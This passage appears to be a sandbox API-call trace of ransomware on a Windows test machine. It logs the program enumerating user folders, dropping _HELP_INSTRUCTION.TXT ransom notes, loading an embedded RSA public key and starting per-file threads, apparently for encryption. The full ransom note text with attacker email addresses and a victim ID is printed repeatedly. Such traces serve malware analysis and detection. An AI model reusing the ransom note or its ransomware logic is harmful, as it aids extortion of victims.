HALPmcxz\\Contacts\\_HELP_INSTRUCTION.TXT") returned 60 [0163.370] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0163.370] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0163.370] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x200) returned 0x0 [0163.370] RegQueryValueExW (in: hKey=0x200, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x469b40, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x469b40*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0163.370] RegCloseKey (hKey=0x200) returned 0x0 [0163.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0163.370] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0163.370] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0163.371] CloseHandle (hObject=0x200) returned 1 [0163.371] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0163.371] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="Contacts" [0163.371] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Contacts" | out: lpString1="Contacts") returned="Contacts" [0163.371] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0163.371] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0163.371] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0163.371] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0163.371] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0163.371] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0163.371] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0163.372] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0163.372] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0163.372] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0163.372] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0163.372] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0163.372] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0163.372] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0163.372] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0163.372] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0163.372] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0163.372] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0163.372] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0163.372] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0163.372] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Cookies" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies" [0163.372] SetErrorMode (uMode=0x1) returned 0x1 [0163.372] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies" [0163.372] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\" [0163.372] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\" [0163.372] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*" [0163.372] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0163.372] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0163.373] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies" [0163.373] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*" [0163.373] SetErrorMode (uMode=0x1) returned 0x1 [0163.373] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\_HELP_INSTRUCTION.TXT") returned 59 [0163.373] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0163.373] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0163.373] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x1c4) returned 0x0 [0163.373] RegQueryValueExW (in: hKey=0x1c4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x469d70, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x469d70*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0163.373] RegCloseKey (hKey=0x1c4) returned 0x0 [0163.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0163.373] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0163.373] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0163.374] CloseHandle (hObject=0x1c4) returned 1 [0163.374] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0163.374] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0163.374] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0163.374] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0163.374] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0163.374] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0163.374] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0163.374] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0163.374] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Desktop" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0163.374] SetErrorMode (uMode=0x1) returned 0x1 [0163.374] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0163.374] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0163.374] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0163.374] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0163.374] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0163.374] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="Desktop" [0163.374] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0163.374] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0163.374] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0163.375] lstrcmpW (lpString1="3wes.gif", lpString2="..") returned 1 [0163.375] lstrcmpW (lpString1="3wes.gif", lpString2=".") returned 1 [0163.375] StrStrW (lpFirst="3wes.gif", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0163.375] StrStrW (lpFirst="3wes.gif", lpSrch="ntldr") returned 0x0 [0163.375] StrStrW (lpFirst="3wes.gif", lpSrch="NTLDR") returned 0x0 [0163.375] StrStrW (lpFirst="3wes.gif", lpSrch="NTDETECT.COM") returned 0x0 [0163.375] StrStrW (lpFirst="3wes.gif", lpSrch="ntdetect.com") returned 0x0 [0163.375] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 42 [0163.375] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") [0163.375] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0163.375] lstrcpyW (in: lpString1=0x17cf1c, lpString2="3wes.gif" | out: lpString1="3wes.gif") returned="3wes.gif" [0163.375] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0163.375] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x180 [0163.375] Sleep (dwMilliseconds=0x96) [0163.540] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0163.540] lstrcmpW (lpString1="cjwLkHotFDrB.csv", lpString2="..") returned 1 [0163.540] lstrcmpW (lpString1="cjwLkHotFDrB.csv", lpString2=".") returned 1 [0163.540] StrStrW (lpFirst="cjwLkHotFDrB.csv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0163.540] StrStrW (lpFirst="cjwLkHotFDrB.csv", lpSrch="ntldr") returned 0x0 [0163.540] StrStrW (lpFirst="cjwLkHotFDrB.csv", lpSrch="NTLDR") returned 0x0 [0163.540] StrStrW (lpFirst="cjwLkHotFDrB.csv", lpSrch="NTDETECT.COM") returned 0x0 [0163.540] StrStrW (lpFirst="cjwLkHotFDrB.csv", lpSrch="ntdetect.com") returned 0x0 [0163.540] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 42 [0163.540] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") [0163.541] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0163.541] lstrcpyW (in: lpString1=0x17cf1c, lpString2="cjwLkHotFDrB.csv" | out: lpString1="cjwLkHotFDrB.csv") returned="cjwLkHotFDrB.csv" [0163.541] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0163.541] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x184 [0163.541] Sleep (dwMilliseconds=0x96) [0163.760] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0163.760] lstrcmpW (lpString1="CtU1cr28O6YeLq5MF4zr.mp3", lpString2="..") returned 1 [0163.760] lstrcmpW (lpString1="CtU1cr28O6YeLq5MF4zr.mp3", lpString2=".") returned 1 [0163.760] StrStrW (lpFirst="CtU1cr28O6YeLq5MF4zr.mp3", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0163.760] StrStrW (lpFirst="CtU1cr28O6YeLq5MF4zr.mp3", lpSrch="ntldr") returned 0x0 [0163.760] StrStrW (lpFirst="CtU1cr28O6YeLq5MF4zr.mp3", lpSrch="NTLDR") returned 0x0 [0163.761] StrStrW (lpFirst="CtU1cr28O6YeLq5MF4zr.mp3", lpSrch="NTDETECT.COM") returned 0x0 [0163.761] StrStrW (lpFirst="CtU1cr28O6YeLq5MF4zr.mp3", lpSrch="ntdetect.com") returned 0x0 [0163.761] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 42 [0163.761] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") [0163.761] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0163.761] lstrcpyW (in: lpString1=0x17cf1c, lpString2="CtU1cr28O6YeLq5MF4zr.mp3" | out: lpString1="CtU1cr28O6YeLq5MF4zr.mp3") returned="CtU1cr28O6YeLq5MF4zr.mp3" [0163.761] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0163.761] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x208 [0163.761] WaitForSingleObject (hHandle=0x208, dwMilliseconds=0xffffffff) returned 0x0 [0163.925] Sleep (dwMilliseconds=0x96) [0164.073] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0164.073] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0164.073] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0164.073] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0164.073] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0164.073] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0164.073] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0164.073] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0164.073] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 42 [0164.073] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") [0164.073] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0164.073] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0164.074] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0164.074] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x204 [0164.074] Sleep (dwMilliseconds=0x96) [0164.227] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0164.227] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0164.227] lstrcmpW (lpString1="FNPUDpYy3rwMi.flv", lpString2="..") returned 1 [0164.227] lstrcmpW (lpString1="FNPUDpYy3rwMi.flv", lpString2=".") returned 1 [0164.227] StrStrW (lpFirst="FNPUDpYy3rwMi.flv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0164.227] StrStrW (lpFirst="FNPUDpYy3rwMi.flv", lpSrch="ntldr") returned 0x0 [0164.227] StrStrW (lpFirst="FNPUDpYy3rwMi.flv", lpSrch="NTLDR") returned 0x0 [0164.227] StrStrW (lpFirst="FNPUDpYy3rwMi.flv", lpSrch="NTDETECT.COM") returned 0x0 [0164.227] StrStrW (lpFirst="FNPUDpYy3rwMi.flv", lpSrch="ntdetect.com") returned 0x0 [0164.227] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 42 [0164.227] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") [0164.227] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- 